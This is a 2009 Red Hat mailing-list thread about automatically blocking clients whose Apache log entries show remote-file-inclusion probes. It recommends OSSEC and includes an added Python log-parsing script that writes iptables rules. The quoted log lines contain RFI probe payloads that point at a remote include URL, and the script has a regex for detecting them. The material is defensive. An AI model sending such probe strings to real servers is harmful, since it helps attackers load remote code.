You may wish to look into OSSEC; it will do integrity checking, rootkit detection, and event log correlation, has an excellent default rule base, and can accept just about any kind of logfile and decode it:
http://www.ossec.net/wiki/index.php/Main_Page
It will also do what you're looking for (OSSEC calls it active response).
Setup time for a new install is about 5 minutes.
Aaron
ESGLinux wrote:
Hi all,
I'm having a problem with an Apache web server.
I get a lot of accesses of this kind:
x.x.x.x - - [08/Jul/2009:09:42:20 +0200] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://aboutav.com//id1.txt??? HTTP/1.1" 404 1015 "-" "Mozilla/5.0"
where x.x.x.x is the IP of the client. I suppose this IP is trying to find a security hole in my system, so what I do manually is this:
iptables -A INPUT -s x.x.x.x -p tcp -m tcp --dport 80 -j DROP
I want to do this automatically. I'm thinking of using logwatch, but I'm not sure how to do it. (I'm testing, but for the moment I haven't found the solution.)
Does anybody know another way to do what I want?
By the way, I'm interested in limiting the connections to my web server using iptables with the limit module and the burst argument. What do you think about it? Is it a good solution or am I on the wrong track? Do you know how to prevent DoS attacks?
Thanks in advance
ESG
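Aaron points ESG to OSSEC's active response; the manual loop ESG describes (spot the probing client in the Apache access log, then add an iptables DROP for it) can also be scripted directly. The following is an added example, not code from this thread or from OSSEC: it parses combined-format access-log lines, flags clients whose query string carries a remote URL (the shape of the request in ESG's log line) or that pile up 404s past a threshold, and emits the same iptables rule ESG applies by hand. The sample log lines, the addresses, the `attacker.invalid` host and the 404 threshold are constructed assumptions.

```python
import re
from collections import Counter

# Apache combined log format, the layout of the line quoted in ESG's post.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) (?P<proto>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)
# A query-string parameter whose value is itself an http(s) URL, i.e. the
# remote-file-inclusion probe shape (CONFIG[pear_dir]=http://...) from the post.
RFI_RE = re.compile(r'[?&][^=&]+=https?://', re.IGNORECASE)

NOTFOUND_THRESHOLD = 20  # assumed tuning value, not from the thread

# Constructed sample log (not real traffic): one RFI-style probe, one normal hit,
# and one client that hammers non-existent paths.
SAMPLE_LOG = [
    '203.0.113.7 - - [08/Jul/2009:09:42:20 +0200] "GET //includes/mailaccess/pop3.php'
    '?CONFIG[pear_dir]=http://attacker.invalid/id1.txt??? HTTP/1.1" 404 1015 "-" "Mozilla/5.0"',
    '198.51.100.4 - - [08/Jul/2009:09:42:21 +0200] "GET /index.html HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
] + [
    f'192.0.2.9 - - [08/Jul/2009:09:43:{i:02d} +0200] "GET /missing{i} HTTP/1.1" 404 300 "-" "curl/7.19"'
    for i in range(25)
]

def parse_line(line):
    """Split one access-log line into its fields; None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def offending_ips(lines, notfound_threshold=NOTFOUND_THRESHOLD):
    """Return {ip: reason} for clients that sent an RFI-style probe or reached
    notfound_threshold 404 responses. Unparseable lines are skipped, not blocked."""
    reasons = {}
    notfound = Counter()
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        if RFI_RE.search(rec["path"]):
            reasons.setdefault(rec["ip"], "remote-file-inclusion probe")
        if rec["status"] == "404":
            notfound[rec["ip"]] += 1
            if notfound[rec["ip"]] >= notfound_threshold:
                reasons.setdefault(rec["ip"], "excessive 404s")
    return reasons

def iptables_rules(reasons):
    """The same rule shape ESG applies by hand, returned as strings so the caller
    decides when to run them (and when to expire them, as active response does)."""
    return [f"iptables -A INPUT -s {ip} -p tcp -m tcp --dport 80 -j DROP" for ip in sorted(reasons)]
```

Pair any rule added this way with an expiry and an allow-list for your own monitoring hosts, since a shared or spoofed source address otherwise turns the blocker into a self-inflicted denial of service.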
--
redhat-list mailing list
unsubscribe mailto:redhat-list-request@xxxxxxxxxx?subject=unsubscribe
https://www.redhat.com/mailman/listinfo/redhat-list